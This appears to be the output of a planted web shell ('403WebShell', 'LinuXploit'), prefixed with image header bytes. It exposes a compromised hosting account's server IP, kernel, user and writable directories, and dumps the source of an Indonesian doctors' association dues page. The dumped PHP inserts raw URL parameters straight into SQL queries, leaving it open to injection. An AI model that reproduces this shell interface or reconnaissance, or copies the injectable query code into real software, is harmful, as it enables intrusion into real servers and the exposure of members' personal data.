JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 88.223.91.129  /  Your IP : 216.73.216.52
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/project/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/IDI/project//data_iur.php
<?php include "header.php"; ?>
<?php
$id_user=$_SESSION["npm"];
$username=$_SESSION["level"];
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
       
        <!-- link to magiczoom.css file -->
        <link href="magiczoom.css" rel="stylesheet" type="text/css" media="screen"/>
        <!-- link to magiczoom.js file -->
        <script src="magiczoom.js" type="text/javascript"></script>
		
		
			<style type="text/css">
		body {
			font-family: "Lucida Sans Unicode", "Lucida Grande", "Segoe Ui";
			font-size: 12px;
		}
		

		
		
	.style1 {
	font-size: 18;
	font-family: Arial, Helvetica, sans-serif;
	font-weight: bold;
}
            .style2 {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 16px;
	font-weight: bold;
}
            .style3 {
	font-size: 16px;
	font-weight: bold;
}
            </style>
		
</head>

<body>
<?php include "bawahnotif2.php"; ?>

	<div class="container">
	<br> 
	  <div class="panel panel-primary">
			<nav class="navbar navbar-inverse">
				<div class="container-fluid">
				 <div class="navbar-header">
				  <a class="navbar-brand" href="index.php">Ikatan Dokter Indonesia</a>
				</div>
			  </div>
			</nav>
			
           <div class="panel-body">
					<?php
					   $noreg = isset($_GET['noreg']) ? $_GET['noreg'] : '';
					
						$npm = $_GET['npm'];
					?>

										<p align="center">No Reg Pengajuan  : <?php echo $noreg ?></p>
					</br>
                    <br>
					
					<!-- Contoh Modal -->

    
     <center><span class="style3">Data Iuran 5 tahun </span></center> 
      <br>  
	  
	  - Masa Berlaku Iuran 5 Tahun wajib belum expired.<br>
	  - Jika Iuran  sudah Expired ,Admin mengirimkan Invoice. <br>
      - Jika sudah dilunasi status "Valid" <br><br>
	<?php
	 $hari = date('Y-m-d');
	$sqlSiswa = mysqli_query($konek, "SELECT * FROM h_registrasi WHERE h_registrasi.npm='$_GET[npm]' AND  h_registrasi.noreg='$_GET[noreg]'");
	$ds=mysqli_fetch_array($sqlSiswa);
	$iuran= $ds['iuran'];
	$npm= $ds['npm'];
	$noreg= $ds['noreg'];
	$pinv= $ds['pinv'];
    ?>
	
	<?php if ( $iuran<$hari){
	?>
							
							<div class='alert alert-warning'>
								
								<?php 
									IF($ds['pinv'] == 'lunas'){
										 echo "Lunas";
										 ?>
		<span class='pull-right'><a href='#'> <span style='color:red'>Iuran sudah Valid, </span><i class='fa fa-angle-double-right'></i></a></span>

								<?php 
									}
									else if ($ds['pinv'] == 'bayar'){			
		echo "<span class='pull-right'> <span style='color:red'>Terimakasih Sudah melakukan Pembayaran, Tunggu Validasi! </span><i class='fa fa-angle-double-right'></i></span>";
				
									}

									else if ($ds['pinv'] == 'tagihan'){			
									
							        echo "<span class='pull-right'> <a href='data_bayarnon.php?npm=$npm&noreg=$noreg'><span style='color:red'>Silahkan Lakukan Pembayaran </span><i class='fa fa-angle-double-right'></i></a></span>";

									}
									
									else if ($ds['pinv'] == 'expired'){		
										 ?>
                                         
            
<span class='glyphicon glyphicon-info-sign'></span> Masa berlaku Iuran : <span style='color:red'><?php echo $iuran; ?></span> Sudah Expired !!                             
			<span class='pull-right'><span style='color:red'>Tunggu Invoice </span><i class='fa fa-angle-double-right'></i></span>
            </div>
									<?php
									}
									else{			
										 echo "-";
									}
									 ?>
							</div>	
							<?php
							}
					?>

			
      
  <table id="contoh" class="demo-table responsive"   >
    <thead>
      <tr>  
        <th>No</th>
		<th>ID </th>
		<th>No Registrasi</th>
		<th>No Invoice</th>
        <th>Nama</th>
		  <th>Alamat</th>
       	  <th>Exp Iuran</th>
		  <th>Nominal Iuran</th>
		   <th>Iuran selanjutnya</th>
		  <th>status</th>
		   <th>Invoice</th>

		  
      </tr>
    </thead>
    <tbody >
      <?php
	   $hari = date('Y-m-d');
      //require 'config.php';
      $row = $konek->query("SELECT * FROM h_registrasi where npm='$_GET[npm]'  AND noreg='$_GET[noreg]'  order by nmlead") or die(mysqli_error());
      $hari = date('Y-m-d');
	  $no = 1;
	  while($fetch = $row->fetch_array()){
	  
//$str=  $fetch['mbstr'];
			//  $date = new DateTime($str);
			//  $mbstr = $date->format('d-m-Y');
		
		      $tgliuran=  $fetch['iuran'];
			  $date = new DateTime($tgliuran);
			  $iuran= $date->format('d-m-Y');
			  
			  $tgl3    = date('Y-m-d', strtotime('+1825 days', strtotime($tgliuran)));
 			  $date = new DateTime($tgl3);
			  $tgl2 = $date->format('d-m-Y');


       ?>
       <tr>
		<td data-header='No'><?php echo $no ?></td>
		 <td data-header='No ID'><?php echo $fetch['npm']?></td>
		  <td data-header='No Registrasi'><?php echo $fetch['noreg']?></td>
		  <td data-header='No Invoice'><?php echo $fetch['noinv']?></td>
		 <td data-header='Nama'><?php echo $fetch['nmlead']?></td>
	
		  	  <td data-header='Alamat'><?php echo $fetch['alamat']?></td>

 
				 <?php 
						IF($fetch['iuran'] < $hari ){
					?>
					<td data-header='Masa berlaku Iuran'><span class='merah'><?php echo $iuran; ?></span></td>
					<?php 
									}else{			
					?>
					<td data-header='Masa berlaku Iuran'><?php echo $iuran ?></td>
					<?php 
									}
					 ?>
		
		 			<td><?php echo '5.000.000'?></td>
		
		           <td data-header='Tanggal Iuran'><?php echo $fetch['tgliuran']?></td> 

					
					
					 <?php 
						IF($fetch['pinv'] <> 'lunas' ){
					?>
					 <td data-header='Status Invoice'><span class='merah'><?php echo $fetch['pinv']?></span'></td>
					<?php 
									}else{			
					?>
					 <td data-header='Status Invoice'><?php echo $fetch['pinv']?></td>
					<?php 
									}
					 ?>
	
					
					
		<td data-header='Action' align='center' >			
					<?php 
									IF($fetch['pinv'] == 'tagihan'){
										 ?>
					 <a class='btn btn-warning btn-sm' href='data_bayarnon.php?noreg=<?php echo $fetch['noreg']; ?>&npm=<?php echo $fetch['npm']; ?>&tgl2=<?php echo $tgl3; ?>'>Bayar Invoice</a>
					<?php 
									}else{			
										 echo "-";
									}
					 ?>
	    	 </td>	
      		</tr>
      <?php
	   $no++;  
    }
    ?>

	 		</tr>
  </tbody>
</table>
<br> 
 <br>  
	 <center><a class='btn btn-warning btn-sm' href='data_str.php?npm=<?php echo $_GET['npm']; ?>&noreg=<?php echo $_GET['noreg']; ?>'>Data</a>  
             <a class='btn btn-warning btn-sm' href='data_prk.php?npm=<?php echo $_GET['npm']; ?>&noreg=<?php echo $_GET['noreg']; ?>'>Praktek Kerja</a>  
	         <a class='btn btn-warning btn-sm' href='data_upl.php?npm=<?php echo $_GET['npm']; ?>&noreg=<?php echo $_GET['noreg']; ?>'>Upload Data</a> </center>
			 <br> 
			 <center> <a class='btn btn-info btn-sm' href='status.php?npm=<?php echo $_GET['npm']; ?>&noreg=<?php echo $_GET['noreg']; ?>'>Cek Status</a></center>
<br>
<br>

</div>					
                            <!--Script Javascript-->
                                <script src="https://code.jquery.com/jquery-1.12.4.js"></script>
                                <script src="https://cdn.datatables.net/1.10.16/js/jquery.dataTables.min.js"></script>
                                <script src="https://cdn.datatables.net/responsive/2.2.1/js/dataTables.responsive.min.js"></script>
                                <script src="https://cdn.datatables.net/buttons/1.5.1/js/dataTables.buttons.min.js"></script>
                                <script src="https://cdn.datatables.net/buttons/1.5.1/js/buttons.colVis.min.js"></script>
                                <script>
 $(document).ready(function() {
  $('#example').DataTable( {
    dom: 'Bfrtip',
    buttons: [
    'colvis'
    ]
  } );
} );
                              </script>								
																	
		

      <p>&nbsp;</p>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit